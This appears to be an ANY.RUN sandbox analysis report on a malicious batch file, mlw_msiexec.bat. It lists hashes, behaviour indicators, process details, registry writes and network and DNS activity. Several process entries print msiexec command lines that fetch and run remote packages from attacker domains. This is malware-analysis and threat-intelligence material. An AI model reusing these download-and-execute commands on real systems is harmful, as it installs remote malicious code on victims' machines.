File name:

mlw_msiexec.bat

Full analysis: https://app.any.run/tasks/29d5d556-9b8b-46aa-b83a-ca9e40d950e5
Verdict: Malicious activity
Analysis date: May 20, 2019, 14:34:13
OS: Windows 7 Professional Service Pack 1 (build: 7601, 32 bit)
Indicators:
MIME: text/plain
File info: ASCII text, with CRLF line terminators
MD5:

8089B31551B33498458E0B1E585266C1

SHA1:

3E0C117CEF303BEF648CEB8B9CB5CE8E8CAB834E

SHA256:

FE3D88D5AB4D3FE56A6D311F87A8C72C0B36E4F942FE8649076197C42128BAC8

SSDEEP:

12:tPt92u926SY92Z92ghMYYciaCbyaevrCbZCbYB:tHjkgq1svJEg

ANY.RUN is an interactive service which provides full access to the guest system. Information in this report could be distorted by user actions and is provided for user acknowledgement as it is. ANY.RUN does not guarantee maliciousness or safety of the content.
  • MALICIOUS

    No malicious indicators.
  • SUSPICIOUS

    • Executable content was dropped or overwritten

      • msiexec.exe (PID: 3900)
      • msiexec.exe (PID: 3468)
      • msiexec.exe (PID: 1740)
      • msiexec.exe (PID: 856)
      • msiexec.exe (PID: 1352)
    • Executed as Windows Service

      • vssvc.exe (PID: 2932)
    • Executed via COM

      • DrvInst.exe (PID: 2384)
      • DrvInst.exe (PID: 1256)
      • DrvInst.exe (PID: 3476)
      • DrvInst.exe (PID: 1484)
    • Application launched itself

      • taskmgr.exe (PID: 3144)
  • INFO

    • Low-level read access rights to disk partition

      • vssvc.exe (PID: 2932)
    • Changes settings of System certificates

      • DrvInst.exe (PID: 2384)
    • Loads dropped or rewritten executable

      • MsiExec.exe (PID: 2956)
      • MsiExec.exe (PID: 2456)
      • MsiExec.exe (PID: 352)
      • MsiExec.exe (PID: 2568)
      • MsiExec.exe (PID: 3364)
      • MsiExec.exe (PID: 2908)
      • MsiExec.exe (PID: 3652)
    • Writes to a desktop.ini file (may be used to cloak folders)

      • msiexec.exe (PID: 3468)
    • Searches for installed software

      • msiexec.exe (PID: 3468)
    • Adds / modifies Windows certificates

      • DrvInst.exe (PID: 2384)
    • Application launched itself

      • msiexec.exe (PID: 3468)
    • Manual execution by user

      • taskmgr.exe (PID: 3144)
Find more information about signature artifacts and mapping to MITRE ATT&CK™ MATRIX at the full report
No Malware configuration.
No data.
screenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshot
All screenshots are available in the full report
All screenshots are available in the full report
Total processes
63
Monitored processes
25
Malicious processes
0
Suspicious processes
0

Behavior graph

Click at the process to see the details
start cmd.exe no specs msiexec.exe msiexec.exe vssvc.exe no specs drvinst.exe no specs msiexec.exe no specs msiexec.exe drvinst.exe no specs msiexec.exe no specs msiexec.exe drvinst.exe no specs msiexec.exe no specs msiexec.exe drvinst.exe no specs msiexec.exe no specs msiexec.exe no specs msiexec.exe no specs msiexec.exe no specs msiexec.exe no specs msiexec.exe no specs msiexec.exe no specs msiexec.exe no specs msiexec.exe no specs taskmgr.exe no specs taskmgr.exe

Process information

PID
CMD
Path
Indicators
Parent process
352C:\Windows\system32\MsiExec.exe -Embedding D9272454AD86347D72B1A5DB01AD15CFC:\Windows\system32\MsiExec.exemsiexec.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows® installer
Exit code:
0
Version:
5.0.7600.16385 (win7_rtm.090713-1255)
Modules
Images
c:\windows\system32\msiexec.exe
c:\systemroot\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\user32.dll
c:\windows\system32\gdi32.dll
856c:\windows\system32\msiexec.exe -package https://superdomain1709.info/kaebhgp.jngc:\windows\system32\msiexec.exe
cmd.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows® installer
Exit code:
1603
Version:
5.0.7600.16385 (win7_rtm.090713-1255)
Modules
Images
c:\windows\system32\msiexec.exe
c:\systemroot\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\user32.dll
c:\windows\system32\gdi32.dll
880cmd /c ""C:\Users\admin\Desktop\mlw_msiexec.bat" "C:\Windows\system32\cmd.exeexplorer.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows Command Processor
Exit code:
1603
Version:
6.1.7601.17514 (win7sp1_rtm.101119-1850)
Modules
Images
c:\windows\system32\cmd.exe
c:\systemroot\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\winbrand.dll
c:\windows\system32\user32.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\lpk.dll
c:\windows\system32\usp10.dll
1256DrvInst.exe "1" "200" "STORAGE\VolumeSnapshot\HarddiskVolumeSnapshot20" "" "" "65dbac317" "00000000" "00000534" "00000064"C:\Windows\system32\DrvInst.exesvchost.exe
User:
SYSTEM
Company:
Microsoft Corporation
Integrity Level:
SYSTEM
Description:
Driver Installation Module
Exit code:
0
Version:
6.1.7600.16385 (win7_rtm.090713-1255)
Modules
Images
c:\windows\system32\drvinst.exe
c:\systemroot\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\setupapi.dll
c:\windows\system32\cfgmgr32.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\sechost.dll
1352c:\windows\system32\msiexec.exe -package https://superdomain1709.info/oecroxyipdoecc.ryoc:\windows\system32\msiexec.exe
cmd.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows® installer
Exit code:
1603
Version:
5.0.7600.16385 (win7_rtm.090713-1255)
Modules
Images
c:\windows\system32\msiexec.exe
c:\systemroot\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\user32.dll
c:\windows\system32\gdi32.dll
1484DrvInst.exe "1" "200" "STORAGE\VolumeSnapshot\HarddiskVolumeSnapshot19" "" "" "61530dda3" "00000000" "000004D8" "00000304"C:\Windows\system32\DrvInst.exesvchost.exe
User:
SYSTEM
Company:
Microsoft Corporation
Integrity Level:
SYSTEM
Description:
Driver Installation Module
Exit code:
0
Version:
6.1.7600.16385 (win7_rtm.090713-1255)
Modules
Images
c:\windows\system32\drvinst.exe
c:\systemroot\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\setupapi.dll
c:\windows\system32\cfgmgr32.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\sechost.dll
1740c:\windows\system32\msiexec.exe -package https://superdomain1709.info/geeuier.foac:\windows\system32\msiexec.exe
cmd.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows® installer
Exit code:
1603
Version:
5.0.7600.16385 (win7_rtm.090713-1255)
Modules
Images
c:\windows\system32\msiexec.exe
c:\systemroot\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\user32.dll
c:\windows\system32\gdi32.dll
2336C:\Windows\system32\MsiExec.exe -Embedding C98BFB1FBA5AF0FCA7DF51D05BA35613C:\Windows\system32\MsiExec.exemsiexec.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows® installer
Exit code:
0
Version:
5.0.7600.16385 (win7_rtm.090713-1255)
Modules
Images
c:\windows\system32\msiexec.exe
c:\systemroot\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\user32.dll
c:\windows\system32\gdi32.dll
2356"C:\Windows\system32\taskmgr.exe" /1C:\Windows\system32\taskmgr.exe
taskmgr.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
HIGH
Description:
Windows Task Manager
Exit code:
0
Version:
6.1.7600.16385 (win7_rtm.090713-1255)
Modules
Images
c:\windows\system32\taskmgr.exe
c:\systemroot\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\user32.dll
2384DrvInst.exe "1" "200" "STORAGE\VolumeSnapshot\HarddiskVolumeSnapshot18" "" "" "6792c44eb" "00000000" "00000304" "000005C4"C:\Windows\system32\DrvInst.exesvchost.exe
User:
SYSTEM
Company:
Microsoft Corporation
Integrity Level:
SYSTEM
Description:
Driver Installation Module
Exit code:
0
Version:
6.1.7600.16385 (win7_rtm.090713-1255)
Modules
Images
c:\windows\system32\drvinst.exe
c:\systemroot\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\setupapi.dll
c:\windows\system32\cfgmgr32.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\sechost.dll
Total events
2 003
Read events
1 091
Write events
796
Delete events
116

Modification events

(PID) Process:(3900) msiexec.exeKey:HKEY_CLASSES_ROOT\Local Settings\MuiCache\62\52C64B7E
Operation:writeName:LanguageList
Value:
en-US
(PID) Process:(3900) msiexec.exeKey:HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap
Operation:writeName:UNCAsIntranet
Value:
0
(PID) Process:(3900) msiexec.exeKey:HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap
Operation:writeName:AutoDetect
Value:
1
(PID) Process:(3900) msiexec.exeKey:HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\msiexec_RASAPI32
Operation:writeName:EnableFileTracing
Value:
0
(PID) Process:(3900) msiexec.exeKey:HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\msiexec_RASAPI32
Operation:writeName:EnableConsoleTracing
Value:
0
(PID) Process:(3900) msiexec.exeKey:HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\msiexec_RASAPI32
Operation:writeName:FileTracingMask
Value:
4294901760
(PID) Process:(3900) msiexec.exeKey:HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\msiexec_RASAPI32
Operation:writeName:ConsoleTracingMask
Value:
4294901760
(PID) Process:(3900) msiexec.exeKey:HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\msiexec_RASAPI32
Operation:writeName:MaxFileSize
Value:
1048576
(PID) Process:(3900) msiexec.exeKey:HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\msiexec_RASAPI32
Operation:writeName:FileDirectory
Value:
%windir%\tracing
(PID) Process:(3900) msiexec.exeKey:HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\msiexec_RASMANCS
Operation:writeName:EnableFileTracing
Value:
0
Executable files
18
Suspicious files
33
Text files
387
Unknown types
3

Dropped files

PID
Process
Filename
Type
3468msiexec.exeC:\System Volume Information\SPP\metadata-2
MD5:
SHA256:
3468msiexec.exeC:\System Volume Information\SPP\OnlineMetadataCache\{6172b762-3bbb-461e-a4f2-f771fb492e2f}_OnDiskSnapshotPropbinary
MD5:
SHA256:
2384DrvInst.exeC:\Windows\INF\setupapi.ev3binary
MD5:
SHA256:
3468msiexec.exeC:\System Volume Information\SPP\snapshot-2binary
MD5:
SHA256:
3468msiexec.exeC:\Users\admin\AppData\Local\Temp\~DF0F5D5D757B33C435.TMP
MD5:
SHA256:
3468msiexec.exeC:\Config.Msi\1262f9.rbs
MD5:
SHA256:
3468msiexec.exeC:\Users\admin\AppData\Local\Temp\~DF877D7ABEA335232A.TMP
MD5:
SHA256:
2932vssvc.exeC:
MD5:
SHA256:
3468msiexec.exeC:\Users\admin\AppData\Local\Temp\Temporary Internet Files\Content.IE5\desktop.iniini
MD5:4A3DEB274BB5F0212C2419D3D8D08612
SHA256:2842973D15A14323E08598BE1DFB87E54BF88A76BE8C7BC94C56B079446EDF38
3468msiexec.exeC:\Users\admin\AppData\Local\Temp\Temporary Internet Files\Content.IE5\FCMOX9ZM\desktop.iniini
MD5:4A3DEB274BB5F0212C2419D3D8D08612
SHA256:2842973D15A14323E08598BE1DFB87E54BF88A76BE8C7BC94C56B079446EDF38
Download PCAP, analyze network streams, HTTP content and a lot more at the full report
HTTP(S) requests
0
TCP/UDP connections
10
DNS requests
4
Threats
0

HTTP requests

No HTTP requests
Download PCAP, analyze network streams, HTTP content and a lot more at the full report

Connections

PID
Process
IP
Domain
ASN
CN
Reputation
3900
msiexec.exe
104.18.53.93:443
refreshnerer711rb.info
Cloudflare Inc
US
shared
3468
msiexec.exe
104.18.53.93:443
refreshnerer711rb.info
Cloudflare Inc
US
shared
3900
msiexec.exe
104.18.56.47:443
superdomain711.info
Cloudflare Inc
US
shared
3468
msiexec.exe
104.18.56.47:443
superdomain711.info
Cloudflare Inc
US
shared
1740
msiexec.exe
104.27.161.100:443
superdomain1709.info
Cloudflare Inc
US
shared
3468
msiexec.exe
104.18.52.207:443
refreshnerer711.info
Cloudflare Inc
US
shared
3468
msiexec.exe
104.27.161.100:443
superdomain1709.info
Cloudflare Inc
US
shared
856
msiexec.exe
104.27.161.100:443
superdomain1709.info
Cloudflare Inc
US
shared
1352
msiexec.exe
104.27.161.100:443
superdomain1709.info
Cloudflare Inc
US
shared

DNS requests

Domain
IP
Reputation
refreshnerer711rb.info
  • 104.18.53.93
  • 104.18.52.93
malicious
superdomain711.info
  • 104.18.56.47
  • 104.18.57.47
suspicious
superdomain1709.info
  • 104.27.161.100
  • 104.27.160.100
unknown
refreshnerer711.info
  • 104.18.52.207
  • 104.18.53.207
suspicious

Threats

No threats detected
No debug info